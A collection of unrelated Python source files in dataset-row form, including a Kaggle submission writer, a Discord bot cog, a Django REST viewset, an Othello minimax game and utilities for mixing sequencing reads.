    # plt.axis((x1,x2,0,50))
    plt.show()
# === GENERATE SUBMISSION FILE ===
def get_predictions_indices(IdLookupTable, keypoint_indices, imageId):
    """Map the FeatureNames requested for one image to prediction-vector indices."""
    requested = IdLookupTable[IdLookupTable["ImageId"] == imageId]
    return [keypoint_indices[name] for name in requested["FeatureName"]]
if generate_results:
    print("Reading IdLookupTable...")
    IdLookupTable = pd.read_csv(IdLookupTable_path)
    print('Generating submission file...')
    with open(output_file_path, 'w') as csvfile:
        writer = csv.writer(csvfile, delimiter=',')
        writer.writerow(['RowId', 'Location'])
        rowid = 1
        for i in range(len(test_predictions)):
            # Kaggle image ids are 1-based.
            imageId = i + 1
            predictions = test_predictions[i]
            for j in get_predictions_indices(IdLookupTable, keypoint_indices, imageId):
                prediction = predictions[j]
                # Clamp predictions to the valid pixel range [0, image_size].
                if prediction < 0:
                    prediction = 0
                elif prediction > image_size:
                    prediction = image_size
                writer.writerow([rowid, prediction])
                rowid += 1
    print('Results saved to', output_file_path)
22,433 | a56d738906958096571e6939c3cca18e931aa421 | from alaska2.alaska_pytorch.models import *
MODELS_SAVE_DIR = "imagenet/checkpoints/"
TENSORBOARD_LOGS_DIR = "imagenet/tensorboard_logs/"
SEED = 2020
EXPERIMENT_HYPER_PARAMETERS = {
0: {
"model_name": "dct_efficientnet_b7_no_weight_sharing",
"model": build_dct_efficientnet_b7_no_weight_sharing,
"input_data_type": "DCT",
"n_classes": 1000,
"use_quality_factor": False,
"separate_classes_by_quality_factor": False,
"use_amp": True,
"devices": [0, 1],
"seed": 2020,
"validation_split": 0.2,
# Model parameters:
"trained_model_path": "imagenet/checkpoints/dct_efficientnet_b7_no_weight_sharing_1593595066_checkpoint.pth",
# Training loop:
"batch_size": 112,
"n_epochs": 1000,
"learning_rate": 0.0002,
"lr_scheduler_exp_gamma": 0.95,
"training_workers": 10,
# Other:
"model_checkpoint_dir": MODELS_SAVE_DIR,
"tensorboard_log_dir": TENSORBOARD_LOGS_DIR,
"log_tensorboard_n_times_per_epoch": 100,
},
}
|
22,434 | 24bb1688e3690c3879440cb489f6349732c61eeb | import matplotlib.pyplot as plt
import numpy as np
#D = 1e-7
rho = 1.225
nu = 1.48e-5
#u0 = 10.
D = 1
#nu = 1e-2
u0 = 10
x = np.linspace(0, 5000000, 50)
y = np.arange(-5, 5, .1)
X, Y = np.meshgrid(x, y)
u = D / (rho * ( 4 * np.pi * u0 * nu) ** .5) * (X ** -.5) * np.exp(- 1 * u0 * Y ** 2 / 4 / nu / X)
#plt.xlim(0, 1)
plt.contourf(X, Y, u0 - u, 1000)
plt.show()
|
22,435 | e6abb323d649cebcea8f3ec3e0866dbbfa61d634 | import json
import logging
import random
from pathlib import Path
from discord.ext import commands
logger = logging.getLogger(__name__)

# Load the canned 8-ball answers once at import time.
with open(Path('bot', 'resources', '8ball.json'), 'r', encoding="utf8") as f:
    eightBallJSON = json.load(f)
class MiniGames(commands.Cog):
    """Small chance-based commands: magic 8-ball and a random chooser."""

    def __init__(self, bot):
        self.bot = bot

    @commands.command(aliases=('8ball',))
    async def eightball(self, ctx, *, question: str = None):
        """Mystic Eight Ball - Responds With Random Answer"""
        # Keyword-only capture (`*`) so a multi-word question is consumed as
        # one argument instead of only its first word.
        if question is None:
            await ctx.send("Error, you have to ask a question!")
        else:
            await ctx.send(random.choice(eightBallJSON['answers']))

    @commands.command(name='choice')
    async def choices(self, ctx, *, options):
        """
        Having a hard time choosing between something?
        Try this command!
        """
        # Options are separated by '-'.
        choice = random.choice(options.split('-'))
        # Bug fix: the original message lacked a space ('My choice is"x"').
        await ctx.send(f'My choice is \"{choice}\"')
def setup(bot):
    # discord.py extension entry point: register the cog when the bot loads it.
    bot.add_cog(MiniGames(bot))
    logger.info('MiniGames cog loaded.')
|
22,436 | 432fccfeb314c99af59ff37d667fbe05ccdcf71b | FENWAY_PARK = (
'https://www.maimmunizations.org/clinic/search?location=&search_radius=All&q%5Bvenue_search_name_or_'
'venue_name_i_cont%5D=fenway&q%5Bclinic_date_gteq%5D=&q%5Bvaccinations_name_i_cont%5D=&commit=Search#'
)
GILLETTE_STADIUM = (
'https://www.maimmunizations.org/clinic/search?location=&search_radius=All&q%5Bvenue_search_name'
'_or_venue_name_i_cont%5D=gillette&q%5Bclinic_date_gteq%5D=&q%5Bvaccinations_name_i_cont%5D=&comm'
'it=Search'
)
NEEDHAM_PUBLIC_HEALTH = (
'https://www.maimmunizations.org/clinic/search?location=&search_radius=All&q%5Bvenue_search_name_'
'or_venue_name_i_cont%5D=Needham+Public&q%5Bclinic_date_gteq%5D=&q%5Bvaccinations_name_i_cont%'
'5D=&commit=Search#search_results'
)
REGGIE_LEWIS = (
'https://www.maimmunizations.org/clinic/search?location=&search_radius=All&q%5Bvenue_search_name_o'
'r_venue_name_i_cont%5D=Reggie+Lewis+State+Track&q%5Bclinic_date_gteq%5D=&q%5Bvaccinations_name_i_'
'cont%5D=&commit=Search#search_results'
)
MARSHFIELD = (
'https://www.maimmunizations.org/clinic/search?location=&search_radius=All&q%5Bvenue_search_'
'name_or_venue_name_i_cont%5D=Marshfield&q%5Bclinic_date_gteq%5D=&q%5Bvaccinations_name_i_'
'cont%5D=&commit=Search#search_results'
)
ALL_SITES = {
'FENWAY_PARK': FENWAY_PARK,
'GILLETTE_STADIUM': GILLETTE_STADIUM,
'NEEDHAM_PUBLIC_HEALTH': NEEDHAM_PUBLIC_HEALTH,
'REGGIE_LEWIS': REGGIE_LEWIS,
'MARSHFIELD': MARSHFIELD,
}
|
22,437 | e8194fca568e1d25eb21f7e6bf52002eaeb1887c | class Attractions:
def __init__(self, path):
self.path_file = path
self.text = ""
self.list_attractions = []
self.set_attractions = set()
def ReadFileText(self):
file = open(self.path_file, 'r', encoding='utf-8')
self.text = file.read()
file.close()
def ListAttractions(self):
list_string = self.text.split('\n')
for i in range(len(list_string)):
if '\tAttractionS' == list_string[i] or '\tAttractionFIO' == list_string[i]:
self.list_attractions.append((list_string[i:i + 4]))
def SetAttractions(self):
for i in self.list_attractions:
i = i[2].split(' = ')[1]
self.set_attractions.add(i)
|
22,438 | fdff574afec95ff884d4b250ada83144ebe1e464 | class Constants:
IMAGE = "img"
TEXT = "text"
class Builder:
MAIN_WINDOW = "main_window"
IMAGE = "image"
IMAGE_FRAME = "image_frame"
DRAW_AREA = "drawarea" |
22,439 | abfd623d7c6078a66fc72d91d04235a50d84e8ca | from dataclasses import dataclass
@dataclass
class Ingredient:
    """A stocked ingredient and the level at which it should be refilled."""
    name: str
    quantity: int  # units currently in stock
    refill_threshold: int  # stock level that triggers a refill (comparison done by callers)
|
22,440 | 36c9d8d2b7d43eaf7567f5a9f75b1eda39dfd688 | from rest_framework.decorators import action
from rest_framework.response import Response
from rest_framework import viewsets, mixins, status
from rest_framework.authentication import TokenAuthentication
from rest_framework.permissions import IsAuthenticated
from core.models import Product
from product import serializers
class BaseProductAttrViewSet(viewsets.GenericViewSet,
                             mixins.ListModelMixin,
                             mixins.CreateModelMixin):
    """Base viewset for user owned product attributes (list + create only)."""
    authentication_classes = (TokenAuthentication,)
    permission_classes = (IsAuthenticated,)

    def get_queryset(self):
        """Return objects for the current authenticated user only"""
        try:
            assigned_only = bool(
                int(self.request.query_params.get('assigned_only', 0))
            )
        except ValueError:
            # Bug fix: a non-numeric ?assigned_only= value raised ValueError
            # (HTTP 500); treat it as "not set" instead.
            assigned_only = False
        queryset = self.queryset
        if assigned_only:
            queryset = queryset.filter(recipe__isnull=False)
        return queryset.filter(user=self.request.user).order_by('-name')

    def perform_create(self, serializer):
        """Create a new object owned by the requesting user."""
        serializer.save(user=self.request.user)
# class TagViewSet(BaseProductAttrViewSet):
# """Manage tags in the database"""
# queryset = Tag.objects.all()
# serializer_class = serializers.TagSerializer
#
#
# class IngredientViewSet(BaseProductAttrViewSet):
# """Manage ingredients in the database"""
# queryset = Ingredient.objects.all()
# serializer_class = serializers.IngredientSerializer
class ProductViewSet(viewsets.ModelViewSet):
    """Manage products in the database for the authenticated user."""
    serializer_class = serializers.ProductSerializer
    queryset = Product.objects.all()
    authentication_classes = (TokenAuthentication,)
    permission_classes = (IsAuthenticated,)

    def _params_to_ints(self, qs):
        """Convert a comma-separated string of IDs to a list of integers."""
        return [int(str_id) for str_id in qs.split(',')]

    def get_queryset(self):
        """Retrieve the requesting user's products, newest first."""
        return self.queryset.filter(user=self.request.user).order_by('-id')

    def get_serializer_class(self):
        """Use the detail serializer for retrieve; the default otherwise."""
        if self.action == 'retrieve':
            return serializers.ProductDetailSerializer
        return self.serializer_class

    def perform_create(self, serializer):
        """Attach the requesting user to a newly created product."""
        serializer.save(user=self.request.user)
22,441 | 67d40691838815a592d0ecbe4d8d7978c00ba47e | import numpy as np
import random
import time
import collections
import math
import sys
import pygame
from copy import deepcopy
SIZE = 6
# Class created by Jalen Jackson
class Stone:
    """One board cell: its coordinates and state ('B', 'W' or '-')."""

    def __init__(self, row, col, state):
        self.state = state
        self.row = row
        self.col = col
        # Adjacent stones keyed by compass direction; absent keys read as None.
        self.neighbors = collections.defaultdict(lambda: None)

    def __repr__(self):
        # A stone prints as its single state character.
        return str(self.state)
# Class created by Jalen Jackson
class Board:
    """A size x size Othello board of Stones, set up with the standard
    four-stone starting position in the centre."""

    def __init__(self, size):
        # Consistency fix: the constructor mixed the `size` argument with the
        # global SIZE; it now uses the argument throughout. The only caller
        # passes SIZE, so behaviour is unchanged.
        self.size = size
        self.stones = [[None] * size for i in range(0, size)]
        for j in range(size):
            for i in range(size):
                self.insert(Stone(i, j, "-"))
        middleLeft = int((self.size / 2) - 1)
        middleRight = int(self.size / 2)
        # Standard start: black on the main diagonal, white on the other.
        self.insert(Stone(middleLeft, middleLeft, "B"))
        self.insert(Stone(middleRight, middleRight, "B"))
        self.insert(Stone(middleLeft, middleRight, "W"))
        self.insert(Stone(middleRight, middleLeft, "W"))

    def count(self, state):
        """Number of stones on the board whose state equals `state`."""
        count = 0
        for j in range(self.size):
            for i in range(self.size):
                if self.get_stone_at(i, j).state == state:
                    count += 1
        return count

    # Inserts the stone on the board at the row & column set in its constructor
    def insert(self, stone):
        self.stones[stone.row][stone.col] = stone

    # Gets the stone at the given row and column
    def get_stone_at(self, row, col):
        return self.stones[int(row)][int(col)]

    def neighbors_of(self, stone):
        """Populate and return stone.neighbors: adjacent stones keyed by
        compass direction ("NORTH", "SOUTHWEST", ...). Off-board directions
        are simply not set. Returns None for a None stone."""
        if stone is None:
            return None
        # One offsets table replaces the original eight copy-pasted bound checks.
        offsets = {
            "NORTH": (-1, 0), "SOUTH": (1, 0), "WEST": (0, -1), "EAST": (0, 1),
            "NORTHWEST": (-1, -1), "NORTHEAST": (-1, 1),
            "SOUTHWEST": (1, -1), "SOUTHEAST": (1, 1),
        }
        for direction, (dr, dc) in offsets.items():
            row, col = stone.row + dr, stone.col + dc
            if 0 <= row < self.size and 0 <= col < self.size:
                stone.neighbors.update({direction: self.stones[row][col]})
        return stone.neighbors

    # Prints the board with row/column headers
    def __repr__(self):
        board = "\n\t Column\nRow\t"
        r = 0
        for c in range(0, self.size):
            board += str(c) + " "
        board += "\n"
        for col in np.array(self.stones):
            board += str(r) + "\t"
            for stone in col:
                board += str(stone) + " "
            board += "\n"
            r += 1
        return board
# Created By Felicia based on algorithm pseudocode
# Input: board, int depth, floats alpha/beta, bool maxPlayer
# Output: heuristic value of the best reachable position
def mini_max(board, depth=2, alpha=-math.inf, beta=math.inf, maxPlayer=True):
    """Alpha-beta minimax: White ('W') maximises, Black ('B') minimises."""
    if maxPlayer == True:
        moves = legal_moves(board, "W")
    else:
        moves = legal_moves(board, "B")
    # NOTE(review): legal_moves returns a list, so `moves == None` never
    # triggers; with no legal moves the loops below do not run and +/-inf is
    # returned instead of a heuristic — confirm whether `not moves` was meant.
    if depth == 0 or moves == None:
        return set_heuristic_value(board)
    elif maxPlayer:
        value = -math.inf
        for move in moves:
            # Evaluate the move on a copy so the real board is untouched.
            futureBoard = deepcopy(board)
            apply_move(move.row, move.col, "W", futureBoard)
            value = max(value, mini_max(futureBoard, depth - 1, alpha, beta, False))
            alpha = max(alpha, value)
            if alpha >= beta:  # beta cutoff
                break
        return value
    else:  # minPlayer
        value = math.inf
        for move in moves:
            futureBoard = deepcopy(board)
            apply_move(move.row, move.col, "B", futureBoard)
            value = min(value, mini_max(futureBoard, depth - 1, alpha, beta, True))
            beta = min(beta, value)
            if alpha >= beta:  # alpha cutoff
                break
        return value
def get_user_postion():
    """Prompt the user for a board position and return it as (row, col) ints."""
    # Prompts evaluate left to right, so the row is requested first.
    return (int(input("Please Enter a row: ")),
            int(input("Please Enter a column: ")))
# created by Felicia
# Modified by Jalen
def legal_moves(board, player):
    """Return the sorted list of empty Stones where `player` may legally move.

    A square is legal when placing there would flank at least one run of
    enemy stones between it and an existing friendly stone.
    """
    movesList = []
    enemyPieces = []
    if player == "W":
        enemy = "B"
    else:
        enemy = "W"
    # get a list of all of the opponent's pieces
    for i in range(SIZE):
        for j in range(SIZE):
            stone = board.get_stone_at(i, j)
            if stone.state == enemy:
                enemyPieces.append(stone)

    # Helper for the flank search: given an enemy stone's neighbours, walk the
    # two opposite directions; when one end is a friendly stone, record the
    # empty square found past the enemy run at the other end.
    def check_directions(neighbors, directionOne, directionTwo):
        if directionOne not in neighbors:
            return
        if directionTwo not in neighbors:
            return
        if neighbors[directionOne].state == player:
            if (
                neighbors[directionTwo].state == "-"
                and neighbors[directionTwo] not in movesList
            ):
                movesList.append(neighbors[directionTwo])
                return
            else:
                # Walk past the run of enemy stones in directionTwo,
                # mutating `neighbors` to advance the cursor.
                while neighbors[directionTwo].state == enemy:
                    moveNeighbors = board.neighbors_of(neighbors[directionTwo])
                    if directionTwo not in moveNeighbors:
                        return
                    if (
                        moveNeighbors[directionTwo].state == "-"
                        and moveNeighbors[directionTwo] not in movesList
                    ):
                        movesList.append(moveNeighbors[directionTwo])
                        return
                    neighbors.update({directionTwo: moveNeighbors[directionTwo]})
        if neighbors[directionTwo].state == player:
            if (
                neighbors[directionOne].state == "-"
                and neighbors[directionOne] not in movesList
            ):
                movesList.append(neighbors[directionOne])
                return
            else:
                # Mirror walk in directionOne.
                while neighbors[directionOne].state == enemy:
                    moveNeighbors = board.neighbors_of(neighbors[directionOne])
                    if directionOne not in moveNeighbors:
                        return
                    if (
                        moveNeighbors[directionOne].state == "-"
                        and moveNeighbors[directionOne] not in movesList
                    ):
                        movesList.append(moveNeighbors[directionOne])
                        return
                    neighbors.update({directionOne: moveNeighbors[directionOne]})

    # Check the four axes (vertical, horizontal and the two diagonals) around
    # every enemy piece.
    for stone in enemyPieces:
        check_directions(board.neighbors_of(stone), "NORTH", "SOUTH")
        check_directions(board.neighbors_of(stone), "EAST", "WEST")
        check_directions(board.neighbors_of(stone), "NORTHEAST", "SOUTHWEST")
        check_directions(board.neighbors_of(stone), "NORTHWEST", "SOUTHEAST")
    # Deterministic ordering: row-major.
    movesList.sort(key=lambda stone: (stone.row, stone.col))
    return movesList
# Created By James
# Function that places a stone
def place_stone(row, col, board, player):
    """Insert a brand-new stone of `player`'s colour at (row, col)."""
    board.insert(Stone(row, col, player))
# Created by Rahin
# Function to check who won
# Jalen fixed error 'board.b[i][j]
def winner(board):
    """Return 'Black', 'White' or 'Tie' according to who owns more stones."""
    whites = 0
    blacks = 0
    # Cleanup: the original also counted empty squares into a variable that
    # was never read.
    for j in range(SIZE):
        for i in range(SIZE):
            state = board.get_stone_at(i, j).state
            if state == "W":
                whites += 1
            elif state == "B":
                blacks += 1
    if blacks > whites:
        return "Black"
    elif whites > blacks:
        return "White"
    else:
        return "Tie"
# Modified by Felicia
def convert_line(startStone, board):
    """Flip every enemy run flanked between startStone and a friendly stone."""
    # Idiom fix: compare string states with ==; `is` relies on CPython string
    # interning and is not a reliable equality test.
    enemy = None
    if startStone.state == "B":
        enemy = "W"
    elif startStone.state == "W":
        enemy = "B"
    neighbors = board.neighbors_of(startStone)
    # Seed the walk with every adjacent enemy stone plus its direction.
    flankStack = list(
        filter(
            lambda stone: stone is not None and stone[1].state == enemy,
            neighbors.items(),
        )
    )
    while len(flankStack) > 0:
        flipList = []
        currentFlank = flankStack.pop(0)
        flankDirection = currentFlank[0]
        flankStone = currentFlank[1]
        # Collect the run of enemy stones along the direction.
        while flankStone.state == enemy:
            flipList.append(flankStone)
            flankStone = flankStone.neighbors.get(flankDirection)
            # Jalen added this to handle walking off the board.
            # NOTE(review): this returns from the whole function, abandoning
            # any remaining stack entries — `break` may have been intended;
            # preserved as-is to keep behaviour unchanged.
            if flankStone is None:
                return
        # Run is closed by one of our own stones: flip everything collected.
        if flankStone.state == startStone.state:
            while flipList:
                currentStone = flipList.pop()
                apply_move(currentStone.row, currentStone.col, startStone.state, board)
def valid(row, col):
    """True when (row, col) lies on the SIZE x SIZE board."""
    # Idiom fix: return the boolean expression directly instead of an
    # if/else that returns True/False.
    return 0 <= row < SIZE and 0 <= col < SIZE
def apply_move(row, col, player, board):
    """Recolour the square at (row, col) to `player` and flip flanked lines."""
    stone = board.get_stone_at(row, col)
    stone.state = player
    board.insert(stone)
    # Flip every enemy run now flanked by the recoloured stone.
    convert_line(stone, board)
# Function created by Felicia
# Finished by Jalen
def set_heuristic_value(board):
    """Score a board from White's perspective (positive favours White).

    Combines disc difference (weakly weighted), mobility (legal move counts)
    and corner ownership (heavily weighted).
    """
    score = 0
    # Disc-count difference, scaled down so mobility and corners dominate.
    score += board.count("W") / 100
    score -= board.count("B") / 100
    # Mobility: number of legal moves available to each side.
    score += len(legal_moves(board, "W"))
    score -= len(legal_moves(board, "B"))
    # Corner ownership: corners are stable, so each is worth a large bonus.
    # Cleanup: the four copy-pasted if/elif corner checks collapsed to a loop.
    corners = (
        board.get_stone_at(0, 0),
        board.get_stone_at(0, SIZE - 1),
        board.get_stone_at(SIZE - 1, 0),
        board.get_stone_at(SIZE - 1, SIZE - 1),
    )
    whiteCornersCaptured = sum(1 for corner in corners if corner.state == "W")
    blackCornersCaptured = sum(1 for corner in corners if corner.state == "B")
    score += 10 * whiteCornersCaptured
    score -= 10 * blackCornersCaptured
    return score
def pick_best_move(moves, board):
    """Return the move with the highest minimax value for White.

    Bug fix: the original comparison was inverted (`if bestValue > value`)
    and the follow-up assignment ran the wrong way (`value = bestValue`),
    so the best-scoring move was effectively never kept.
    """
    bestMove = random.choice(moves)
    bestValue = -math.inf
    for move in moves:
        # Score the move on a copy so the live board is untouched.
        futureBoard = deepcopy(board)
        apply_move(move.row, move.col, "W", futureBoard)
        value = mini_max(futureBoard)
        if value > bestValue:
            bestValue = value
            bestMove = move
    return bestMove
# Created By Felicia
# input: None
# Controls the game flow
def play_game():
    """Run one random-move (Black) vs minimax (White) Othello game with a
    pygame display. Loops until neither side can move, then prints the winner."""
    sys.setrecursionlimit(1000)
    # pygame Added: window, colours and per-cell geometry.
    pygame.init()
    size = width, height = 800, 600
    green = 46, 139, 87
    white = 255, 255, 255
    gray = 192, 192, 192
    black = 0, 0, 0
    widthLines = (width) // SIZE
    heightLines = height // SIZE
    square = int(np.sqrt(width * height // (SIZE * SIZE)))  # size of each square
    rad = square // 4
    # Offsets that centre a stone inside its grid cell.
    shiftR = int(square / 2 * width / height)
    shiftD = int(square / 2 * height / width)
    screen = pygame.display.set_mode(size)
    # end of pygame
    board = Board(SIZE)
    # Pre-populate every stone's neighbour map once.
    for i in range(SIZE):
        for j in range(SIZE):
            board.neighbors_of(board.get_stone_at(i, j))
    gameInPlay = True
    # assume Player1 is 'B' stones
    player1 = True
    passedTurn = False
    while gameInPlay:
        # pygame stuff: redraw the grid and all stones each turn.
        screen.fill(green)
        for i in range(SIZE):
            j = i + 1
            pygame.draw.line(screen, gray, (widthLines * j, height), (widthLines * j, 0), 1)
        for i in range(SIZE):
            j = i + 1
            pygame.draw.line(screen, gray, (width, heightLines * j), (0, heightLines * j), 1)
        for i in range(SIZE):
            for j in range(SIZE):
                stone = (board.get_stone_at(i, j))
                if stone.state == 'W':
                    pygame.draw.circle(screen, white, [i * widthLines + shiftR, j * heightLines + shiftD], rad)
                elif stone.state == 'B':
                    pygame.draw.circle(screen, black, [i * widthLines + shiftR, j * heightLines + shiftD], rad)
        pygame.display.flip()
        # end of pygame
        print(board)
        moves = []
        print("Black Stones: " + str(board.count("B")))
        print("White Stones: " + str(board.count("W")))
        # players turn
        if player1 == True:
            moves = legal_moves(board, "B")
            for i in moves:
                print(i.row, i.col)
            # no legal moves means player forfeits turn
            if not moves:
                player1 = False
                # if the opposing player was unable to make a move the game is over
                if passedTurn == True:
                    break
                else:
                    passedTurn = True
            # otherwise get input from player
            else:
                position = False
                passedTurn = False
                while position == False:
                    # row, col = get_user_postion() # return x,y
                    # Black currently plays a random legal move instead of
                    # prompting the user.
                    move = random.choice(moves)
                    row = move.row
                    col = move.col
                    time.sleep(2)
                    if valid(row, col):
                        playerMove = board.get_stone_at(row, col)
                        if playerMove in moves:  # if it's a legal move
                            apply_move(playerMove.row, playerMove.col, "B", board)
                            position = True  # next turn
                            player1 = False
        # The Computer's turn
        else:
            moves = legal_moves(board, "W")
            for i in moves:
                print(i.row, i.col)
            if not moves:
                if passedTurn == True:
                    break
                else:
                    passedTurn = True
                    player1 = True
            else:
                passedTurn = False
                # pick the highest value
                compMove = pick_best_move(moves, board)
                # TODO need to validate move
                time.sleep(2)
                if valid(compMove.row, compMove.col):
                    apply_move(compMove.row, compMove.col, "W", board)
                    player1 = True
    whoWon = winner(board)
    if whoWon == "Black" or whoWon == "White":
        print(whoWon + " Won")
    else:
        print(whoWon)
    time.sleep(10)
    # TODO do something
if __name__ == "__main__":
play_game()
|
22,442 | f51e73745e0d4075a348e96d2f674caf60a0d4ac | import subprocess
import shlex
import logging
import pyfastx
import random
import jinja2
import sys
from pathlib import Path
from functools import reduce
from operator import getitem
class PoreLogger:
    """Mixin that configures root logging and keeps a logger handle."""

    def __init__(self, level=logging.ERROR, name: str = None):
        """Configure the root logger with a tagged format string.

        Args:
            level: logging threshold (default: logging.ERROR).
            name: label baked into every log line's prefix.
        """
        log_format = f"[%(asctime)s] [{name}] %(message)s"
        logging.basicConfig(level=level, format=log_format, datefmt='%H:%M:%S')
        self.logger = logging.getLogger()
def get_output_handle(fpath: str, fastx: bool = False, out: bool = True):
    """Resolve *fpath* to an open handle.

    '-' maps to stdout (out=True) or stdin (out=False).  Otherwise the
    parent directory must already exist; with fastx=True a pyfastx index
    handle is returned (Fasta when the path ends in 'a', else Fastq),
    otherwise a plain text handle opened for writing.

    Raises:
        NotADirectoryError: if the parent directory of *fpath* is missing.
    """
    if fpath == "-":
        return sys.stdout if out else sys.stdin

    p = Path(fpath)
    if not p.parent.is_dir():
        raise NotADirectoryError(
            "Directory specified for output file does not exist: {}".format(
                p.parent
            )
        )

    if not fastx:
        return p.open("w")

    # Fasta file names conventionally end in 'a' (.fa / .fasta).
    return pyfastx.Fasta(p) if fpath.endswith("a") else pyfastx.Fastq(p)
def run_cmd(cmd, callback=None, watch=False, background=False, shell=False):
    """Runs the given command and gathers the output.

    If a callback is provided, then the output is sent to it, otherwise it
    is just returned.

    Optionally, the output of the command can be "watched" and whenever new
    output is detected, it will be sent to the given `callback`.

    Args:
        cmd: command line (split with shlex unless `shell` is True).
        callback: optional callable receiving output chunks (bytes).
        watch: stream stdout line-by-line to `callback` while running.
        background: return immediately with (pid, Popen) for monitoring.
        shell: run via the shell instead of exec-ing the argv directly.

    Returns:
        A string containing the output of the command, or None if a `callback`
        was given.

    Raises:
        RuntimeError: When `watch` is True, but no callback is given.
    """
    if watch and not callback:
        raise RuntimeError(
            "You must provide a callback when watching a process."
        )
    output = None
    if shell:
        proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
    else:
        proc = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE)
    if background:
        # Let task run in background and return pmid for monitoring:
        return proc.pid, proc
    if watch:
        while proc.poll() is None:
            line = proc.stdout.readline()
            # stdout yields *bytes*; the original compared against the
            # str "" (always unequal), so empty reads were forwarded to
            # the callback too.  Truthiness handles bytes and str alike.
            if line:
                callback(line)
        # Sometimes the process exits before we have all of the output, so
        # we need to gather the remainder of the output.
        remainder = proc.communicate()[0]
        if remainder:
            callback(remainder)
    else:
        output = proc.communicate()[0]
    if callback and output is not None:
        return callback(output)
    return output
class ArtificialMixture(PoreLogger):
    """ Composes artificial mixtures of host and pathogen sequence reads """
    def __init__(self, composition: dict, reads: int = 10000, verbose: bool = False):
        """ Composes artificial mixtures of host and pathogen reads
        :param composition: dictionary: {'host': {file='host.fq', proportion=0.90}}
        :param reads: total number of reads to compose
        :param verbose: log at INFO level instead of ERROR
        """
        PoreLogger.__init__(self, level=logging.INFO if verbose else logging.ERROR)
        self.composition = composition
        self.reads = reads
        self.check_proportions()
        self.fastq: dict = self.prepare_fastq()
    def prepare_fastq(self) -> dict:
        """ Checks file paths of input files and creates indices

        :raises ValueError: when a composition file does not exist
        :return: mapping of organism name -> pyfastx.Fastq index
        """
        fastq = {}
        for organism, data in self.composition.items():
            file = data['file']
            file_path = Path(file)
            if not file_path.exists():
                raise ValueError(f'File {file_path} does not exist.')
            else:
                fastq[organism] = pyfastx.Fastq(file)
        self.logger.info('Prepared read files - proceeding')
        return fastq
    def check_proportions(self):
        """ Check that proportions in composition file sum to 1"""
        proportions = [
            v['proportion'] for k, v in self.composition.items()
        ]
        # NOTE(review): exact float comparison against 1.0 — sums such
        # as 0.1*10 may fail here; consider math.isclose if that bites.
        if sum(proportions) < 1.0:
            raise ValueError('Sum of proportions between host and pathogen must be 1.0.')
        elif sum(proportions) > 1.0:
            raise ValueError('Sum of proportions between host and pathogen allocations cannot exceed 1.0')
        else:
            self.logger.info('Sum of proportions equals 1.0 - proceeding')
    def compose(self, fout: Path, shuffle: bool = True):
        """ Compose an artificial mixture of reads

        Read names / description headers are renamed according to sequentially
        numbered keys in the composition file, e.g. saureus_0, saureus_1 ... to
        better distinguish between composition components later.

        :param fout: file path to output fastq
        :param shuffle: shuffle reads before writing
        """
        self.logger.info('Sample and mix read data')
        reads_out = []
        for organism, fastq in self.fastq.items():
            read_names = [read.name for read in fastq]  # need to solve iterator for sampling, names avoid memory
            # int() truncation may reduce the total below self.reads.
            sampled_read_names = self.sample(read_names, reads=int(
                self.composition[organism]['proportion']*self.reads)
            )  # check if integer conversion can reduce total reads
            read_strings = self.rename_headers(
                reads=[fastq[name] for name in sampled_read_names],
                organism=organism
            )
            reads_out += read_strings
        if shuffle:
            self.logger.info('Shuffle output reads')
            random.shuffle(reads_out)
        self.logger.info(f'Write reads to: {fout}')
        with fout.open('w') as out:
            for read_str in reads_out:
                out.write(read_str + '\n')
        self.clean()
    def clean(self):
        """ Clean up the Fastq index files from Pyfastx """
        for _, data in self.composition.items():
            index_file = Path(data['file'] + '.fxi')
            if index_file.exists():
                index_file.unlink()
    @staticmethod
    def rename_headers(reads: list, organism: str):
        """ Rename read headers from the Pyfastx reads (read-only)

        :param reads: list of pyfastx reads
        :param organism: prefix for the sequential header names
        :return: list of raw read strings with rewritten headers
        """
        i = 0
        read_strings = []
        for read in reads:
            read_str = read.raw.splitlines()
            # First line of a Fastq record is the header.
            read_str[0] = f'@{organism}_{i}'
            read_str = '\n'.join(read_str)
            read_strings.append(read_str)
            i += 1
        return read_strings
    @staticmethod
    def sample(fastq: list, reads: int = None, replacement: bool = False):
        """ Sample a list of Fastq reads / read names

        :param fastq: list to sample from
        :param reads: number of items to draw
        :param replacement: sample with replacement when True
        """
        if replacement:
            sampled_reads = random.choices(fastq, k=reads)
        else:
            sampled_reads = random.sample(fastq, k=reads)
        return sampled_reads
def create_fastx_index(fastx: Path) -> (pyfastx.Fasta, Path):
    """Build a pyfastx index for *fastx*.

    Returns a tuple of (index object, path of the .fxi index file).

    Raises:
        ValueError: when the file is neither Fasta nor Fastq.
    """
    index_path = Path(str(fastx) + '.fxi')
    if is_fasta(fastx):
        return pyfastx.Fasta(str(fastx), build_index=True), index_path
    if is_fastq(fastx):
        return pyfastx.Fastq(str(fastx), build_index=True), index_path
    raise ValueError(
        f'Could not determine input file format: {fastx}'
    )
def is_fasta(fastx: Path):
    """True when the file's first line is a Fasta header ('>')."""
    with fastx.open() as handle:
        first_line = handle.readline()
    return first_line.startswith('>')
def is_fastq(fastx: Path):
    """True when the file's first line is a Fastq header ('@')."""
    with fastx.open() as handle:
        first_line = handle.readline()
    return first_line.startswith('@')
def color_tree(
    data: str,
    color_branches: bool = True,
    template: str = "itol.color.txt",
    output: Path = Path('itol.color.txt')
):
    """Render an iTOL colour-annotation file from a Jinja2 template.

    :param data: formatted string to insert into template for data block
    :param color_branches: render branch colouring (1) when True, else 0
    :param template: template file name inside the package 'templates' dir
    :param output: path of the rendered annotation file to write
    :return: None; the rendered text is written to *output*
    """
    template_loader = jinja2.FileSystemLoader(
        searchpath=f"{Path(__file__).parent / 'templates'}"
    )
    template_env = jinja2.Environment(loader=template_loader)
    # Distinct name: the original rebound the `template` parameter to the
    # compiled Template object, shadowing the file-name argument.
    compiled = template_env.get_template(template)
    rendered = compiled.render(
        data=data,
        color_branches=1 if color_branches else 0
    )
    with output.open('w') as fh:
        fh.write(rendered)
def smart_open(filename: str or Path = None, mode: str = "w"):
    """Open *filename*; None, '' or '-' all mean standard output."""
    if not filename or filename == '-':
        return sys.stdout
    if isinstance(filename, str):
        return open(filename, mode)
    # Assume a Path-like object exposing .open().
    return filename.open(mode)
def set_nested_item(data_dict: dict, key_list: tuple or list, value):
    """Set item in nested dictionary.

    Walks *key_list* down into *data_dict* and assigns *value* at the
    innermost key; returns the (mutated) outer dictionary.
    """
    target = data_dict
    for key in key_list[:-1]:
        target = target[key]
    target[key_list[-1]] = value
